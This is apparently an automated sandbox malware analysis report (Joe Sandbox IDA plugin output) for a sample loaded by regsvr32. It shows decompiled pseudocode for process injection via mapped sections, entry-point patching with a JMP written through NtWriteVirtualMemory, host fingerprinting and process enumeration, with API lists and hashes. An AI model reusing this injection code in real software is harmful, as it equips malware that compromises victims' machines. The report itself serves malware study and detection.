		E04AF8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
		E04AFD3C6(_v16, _v8, _v44);
		_t124 = E04AFA43D("quatr");
		_v53 = _t138;
		_t147 = 0xf;
		if(_t124 > _t147) {
			do {
				L12:
				_t63 = _t138 + 0x41; // 0x41
				 *((char*)(_t165 + _t138 - 0x40)) = _t63;
				_t138 = _t138 + 1;
			} while (_t138 < _t147);
			L13:
			lstrlenW( &_v68);
			 *0x4b0f830 = _t155;
			 *0x4b0f81c = _v36;
			goto L17;
		}
		_t147 = _t124;
		if(_t147 == 0) {
			goto L13;
		}
                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}







































                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(04AFD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 04AFD4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 04AFD50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 04AFD538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 04AFD543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 04AFD54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(04AFD982,00000000), ref: 04AFD579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(04AFD982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 04AFD5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 04AFD5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 04AFD600
                                                                                                                                                                                                • Part of subcall function 04AF8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04AF8C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,04AF61C5), ref: 04AFD678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 04AFD6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 04AFD6D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: 21d8711d259468aac7ad4b2b485f50ac7c83ea07199028c135afebc74c36d099
                                                                                                                                                                                              • Instruction ID: 4ffdc39d708dcf05396375bd46da47b84dee01742d6cddb6a221ee0872ac66c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d8711d259468aac7ad4b2b485f50ac7c83ea07199028c135afebc74c36d099
                                                                                                                                                                                              • Instruction Fuzzy Hash: B28107B1A00219AFDB21DFD4DC84EEEBBB8FB18705F14416AF605A7290D774AE41CB64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 211 4afd959-4afd972 call 4afd218 214 4afda4b-4afda56 call 4afd38b 211->214 215 4afd978-4afd986 call 4afd447 211->215 215->214 220 4afd98c-4afd9c3 call 4af8d6d GetThreadContext 215->220 220->214 223 4afd9c9-4afda09 NtProtectVirtualMemory 220->223 224 4afda0b-4afda26 NtWriteVirtualMemory 223->224 225 4afda49 223->225 224->225 226 4afda28-4afda47 NtProtectVirtualMemory 224->226 225->214 226->214 226->225
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFD959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				intOrPtr _v23;
                                                                                                                                                                                              				void _v24;
                                                                                                                                                                                              				long _v28;
                                                                                                                                                                                              				struct _CONTEXT _v744;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				void** _t65;
                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __edx;
                                                                                                                                                                                              				_t57 = __ecx;
                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                              				if(E04AFD218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                                              					_t33 = E04AFD447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                                              					_t66 = _t33;
                                                                                                                                                                                              					if(_t66 != 0) {
                                                                                                                                                                                              						E04AF8D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                                              						_v744.ContextFlags = 0x10002;
                                                                                                                                                                                              						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                                              							_t62 = _v744.Eax;
                                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              							_v24 = 0xe9;
                                                                                                                                                                                              							_t59 = 5;
                                                                                                                                                                                              							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                                              							_v8 = _t59;
                                                                                                                                                                                              							_v16 = _t62;
                                                                                                                                                                                              							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                                              								L6:
                                                                                                                                                                                              								_t66 = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04AFD38B();
                                                                                                                                                                                              				return _t66;
                                                                                                                                                                                              			}




















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFD218: LoadLibraryW.KERNEL32 ref: 04AFD312
                                                                                                                                                                                                • Part of subcall function 04AFD447: NtCreateSection.NTDLL(04AFD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 04AFD4B9
                                                                                                                                                                                                • Part of subcall function 04AFD447: RegisterClassExA.USER32(?), ref: 04AFD50D
                                                                                                                                                                                                • Part of subcall function 04AFD447: CreateWindowExA.USER32 ref: 04AFD538
                                                                                                                                                                                                • Part of subcall function 04AFD447: DestroyWindow.USER32(00000000), ref: 04AFD543
                                                                                                                                                                                                • Part of subcall function 04AFD447: UnregisterClassA.USER32 ref: 04AFD54E
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 04AFD9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 04AFDA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 04AFDA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 04AFDA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: 1f79157f6e9b3ec990c90867f03fc1a9a19d78111168086f898473e8bb661233
                                                                                                                                                                                              • Instruction ID: da00e6b765f6125332daab015efccfa80bc1f69f3c21b2035ea485f3557fd552
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f79157f6e9b3ec990c90867f03fc1a9a19d78111168086f898473e8bb661233
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E312D72A0010AAFDB21DFE4DD84FEEBBBCEF45215F1041A6EA05E7160D770EA458B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E04AFDF3D(void* __fp0) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v144;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v2644;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                                                              				intOrPtr _t87;
                                                                                                                                                                                              				int _t90;
                                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                                              				void* _t93;
	void* _t97;
	intOrPtr _t99;
	intOrPtr _t101;
	short _t106;
	char _t108;
	intOrPtr _t113;
	intOrPtr _t116;
	intOrPtr _t119;
	intOrPtr _t123;
	intOrPtr _t134;
	intOrPtr _t136;
	intOrPtr _t138;
	intOrPtr _t141;
	intOrPtr _t143;
	intOrPtr _t148;
	void* _t149;
	WCHAR* _t150;
	char* _t151;
	intOrPtr _t162;
	intOrPtr _t177;
	void* _t191;
	struct _OSVERSIONINFOA* _t192;
	void* _t193;
	void* _t195;
	char _t198;
	void* _t199;
	char* _t200;
	void* _t203;
	int* _t204;
	void* _t216;

	_t216 = __fp0;
	_t148 =  *0x4b0f830; // 0x4af0000
	_t68 = E04AF8BDE(0x1ac4);
	_t192 = _t68;
	if(_t192 != 0) {
		 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
		_t70 =  *0x4b0f818; // 0x4c2f8b0
		_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
		_t3 = _t192 + 0x648; // 0x648
		E04B03548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
		_t73 =  *0x4b0f818; // 0x4c2f8b0
		_t5 = _t192 + 0x1644; // 0x1644
		_t194 = _t5;
		_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
		_t207 = _t74;
		if(_t74 != 0) {
			 *((intOrPtr*)(_t192 + 0x1854)) = E04AF95F3(_t194, _t207);
		}
		_t75 =  *0x4b0f818; // 0x4c2f8b0
		_t77 = E04AFC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
		 *((intOrPtr*)(_t192 + 0x110)) = _t77;
		_t159 =  *_t77;
		if(E04AFC9F4( *_t77) == 0) {
			_t79 = E04AFC8C9(_t159, _t194); // executed
			__eflags = _t79;
			_t162 = (0 | _t79 > 0x00000000) + 1;
			__eflags = _t162;
			 *((intOrPtr*)(_t192 + 0x214)) = _t162;
		} else {
			 *((intOrPtr*)(_t192 + 0x214)) = 3;
		}
		_t14 = _t192 + 0x220; // 0x220, executed
		_t80 = E04AFF3A3(_t14); // executed
		 *((intOrPtr*)(_t192 + 0x218)) = _t80;
		_t81 = E04AFF368(_t14); // executed
		 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
		_t17 = _t192 + 0x114; // 0x114
		_t195 = _t17;
		 *((intOrPtr*)(_t192 + 0x224)) = _t148;
		_push( &_v16);
		_v12 = 0x80;
		_push( &_v8);
		_v8 = 0x100;
		_push( &_v656);
		_push( &_v12);
		_push(_t195);
		_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
		_t87 =  *0x4b0f820; // 0x4c2faa0
		_push(0); // executed
		if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
			GetLastError();
		}
		_t90 = GetSystemMetrics(0x1000);
		_t28 = _t192 + 0x228; // 0x228
		_t149 = _t28;
		 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
		E04AFDF36(_t149); // executed
		_t211 = _t149;
		if(_t149 != 0) {
			 *((intOrPtr*)(_t192 + 0x434)) = E04AF95F3(_t149, _t211);
		}
		_t92 = E04AFC6CE();
		_t33 = _t192 + 0xb0; // 0xb0
		_t196 = _t33;
		 *((intOrPtr*)(_t192 + 0xac)) = _t92;
		_t93 = E04AFC4C1(_t92, _t33, _t211, _t216);
		_t35 = _t192 + 0xd0; // 0xd0
		E04AF99DF(_t93, _t33, _t35);
		_t36 = _t192 + 0x438; // 0x438
		E04AF960D(_t149, _t36);
		_t97 = E04AFE2C5(_t196, E04AFA43D(_t33), 0);
		_t37 = _t192 + 0x100c; // 0x100c
		E04AFC6E4(_t97, _t37, _t216);
		_t99 =  *0x4b0f818; // 0x4c2f8b0
		_t101 = E04AFCA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
		 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
		E04AF8D6D(_t192, 0, 0x9c);
		_t204 = _t203 + 0xc;
		_t192->dwOSVersionInfoSize = 0x9c;
		GetVersionExA(_t192);
		 *((intOrPtr*)(_t192 + 0xa8)) = E04AFDD39(_t100);
		_t106 = E04AFDD62(_t105);
		_t41 = _t192 + 0x1020; // 0x1020
		_t150 = _t41;
		 *((short*)(_t192 + 0x9c)) = _t106;
		GetWindowsDirectoryW(_t150, 0x104);
		_t108 = E04AF9DF2(_t105, 0x9cf);
		_t177 =  *0x4b0f818; // 0x4c2f8b0
		_t198 = _t108;
		 *_t204 = 0x104;
		_push( &_v668);
		_push(_t198);
		_v8 = _t198;
		if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
			_t143 =  *0x4b0f818; // 0x4c2f8b0
			 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
		}
		E04AF8BAF( &_v8);
		_t113 =  *0x4b0f818; // 0x4c2f8b0
		_t48 = _t192 + 0x1434; // 0x1434
		_t199 = _t48;
		 *_t204 = 0x209;
		_push(_t199);
		_push(L"USERPROFILE");
		if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
			E04AF9E51(_t199, 0x105, L"%s\\%s", _t150);
			_t141 =  *0x4b0f818; // 0x4c2f8b0
			_t204 =  &(_t204[5]);
			 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
		}
		_push(0x20a);
		_t51 = _t192 + 0x122a; // 0x122a
		_t151 = L"TEMP";
		_t116 =  *0x4b0f818; // 0x4c2f8b0
		_push(_t151);
		if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
			_t138 =  *0x4b0f818; // 0x4c2f8b0
			 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
		}
		_push(0x40);
		_t200 = L"SystemDrive";
		_push( &_v144);
		_t119 =  *0x4b0f818; // 0x4c2f8b0
		_push(_t200);
		if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
			_t136 =  *0x4b0f818; // 0x4c2f8b0
			 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
		}
		_v8 = 0x7f;
		_t59 = _t192 + 0x199c; // 0x199c
		_t123 =  *0x4b0f818; // 0x4c2f8b0
		 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
		_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E04B03548(E04AFE2C5(_t62, E04AFA43D(_t62), 0),  &_v2644);
                                                                                                                                                                                              					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                                              					E04B0351A( &_v2644, _t63, 0x20);
                                                                                                                                                                                              					_push( &_v2644);
                                                                                                                                                                                              					_push(0x1e);
                                                                                                                                                                                              					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                                              					_t191 = 0x14;
                                                                                                                                                                                              					E04AF96DA(_t66, _t191);
                                                                                                                                                                                              					_t134 = E04AFDAE3(_t191); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                                              					return _t192;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t68;
                                                                                                                                                                                              			}























































                                                                                                                                                                                              0x04afe2c0
                                                                                                                                                                                              0x04afe2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04AFDF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 04AFE05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 04AFE06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 04AFE123
                                                                                                                                                                                                • Part of subcall function 04AFC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04AF0000), ref: 04AFC96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 04AFE14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3131805607-2706916422
                                                                                                                                                                                              • Opcode ID: 474b86a5f90093d579a35c2424c472388f283c3ca2c6429b7eca0ef0196ee865
                                                                                                                                                                                              • Instruction ID: beefaf124aa17b2541996d7799be57894919dad27f2d915340923164a9a14f45
                                                                                                                                                                                              • Opcode Fuzzy Hash: 474b86a5f90093d579a35c2424c472388f283c3ca2c6429b7eca0ef0196ee865
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A916D71700605AFE714EBB4DD49FEAB7E8FF08305F00416AF61997290EB74B9858BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E04AFC5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				short _v528;
                                                                                                                                                                                              				short _v1040;
                                                                                                                                                                                              				short _v1552;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              				WCHAR* _t27;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                              				WCHAR* _t43;
                                                                                                                                                                                              				WCHAR* _t56;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t44 = __ecx;
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                              				_t56 = __ecx;
                                                                                                                                                                                              				E04AF8D6D(__edx, 0, 0x100);
                                                                                                                                                                                              				_v12 = 0x100;
                                                                                                                                                                                              				_t23 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                                              				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                                              				_t27 = E04AF9DF2(_t44, 0xad6);
                                                                                                                                                                                              				_v16 = _t27;
                                                                                                                                                                                              				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                              				E04AF8BAF( &_v16);
                                                                                                                                                                                              				_t33 = E04AFA456(_t43);
                                                                                                                                                                                              				E04AF9E51( &(_t43[E04AFA456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                              				lstrcatW(_t43, _t56);
                                                                                                                                                                                              				_t38 = E04AFA456(_t43);
                                                                                                                                                                                              				_v12 = _t38;
                                                                                                                                                                                              				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                              				return E04AFE2C5(_t43, E04AFA456(_t43) + _t40, 0);
                                                                                                                                                                                              			}

















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 04AFC633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 04AFC665
                                                                                                                                                                                                • Part of subcall function 04AF9E51: _vsnwprintf.MSVCRT ref: 04AF9E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 04AFC69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 04AFC6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: 0630d3980eed6dd53d1f21d2e6255db70781059652fea707cebddafa1276d062
                                                                                                                                                                                              • Instruction ID: bab8544e7ac10d54c87e84eb6cc5a8515eaca294b5801adffe4fe49846565f1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0630d3980eed6dd53d1f21d2e6255db70781059652fea707cebddafa1276d062
                                                                                                                                                                                              • Instruction Fuzzy Hash: CA2174B2A00218BFEB10ABF4DD49FEF77BCEB54215F108565F605D3181EA74AE448B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E04AFB96A(void* __ecx, void* __edx) {
                                                                                                                                                                                              				void* _v304;
                                                                                                                                                                                              				void* _v308;
                                                                                                                                                                                              				intOrPtr _v312;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t33 = __edx;
                                                                                                                                                                                              				_v304 = __ecx;
                                                                                                                                                                                              				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                              				_t45 = _t16;
                                                                                                                                                                                              				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                                              				if(_t45 != _t17) {
                                                                                                                                                                                              					E04AF8D6D( &_v304, 0, 0x128);
                                                                                                                                                                                              					_v304 = 0x128;
                                                                                                                                                                                              					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                                              						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                                              						FindCloseChangeNotification(_t45);
                                                                                                                                                                                              						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t30 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                                              						_t17 = 0xfffffffe;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t17;
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 04AFB988
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 04AFB9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 04AFB9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04AFB9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: 8e74b438aa0f9cedf8b973fa1554efa7566d804bc2d30efca56a3d5b9ac5c525
                                                                                                                                                                                              • Instruction ID: 72117b6cf1ff295b6c413d12e105cc9b377ba190f68f944817f12667b35a8fe2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e74b438aa0f9cedf8b973fa1554efa7566d804bc2d30efca56a3d5b9ac5c525
                                                                                                                                                                                              • Instruction Fuzzy Hash: F41163723043019FD320EEA8EC49EAB77ECFF85261F140A69F660C7190EB24E94587B1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFEEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				struct HINSTANCE__* _t58;
                                                                                                                                                                                              				_Unknown_base(*)()* _t59;
                                                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				char _t70;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				CHAR* _t80;
                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                              				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                              				if(_t41 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t62 = _t41 + __ecx;
                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                              				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                              				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                              				_t47 = 0;
                                                                                                                                                                                              				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v16 = _t63;
                                                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					L2:
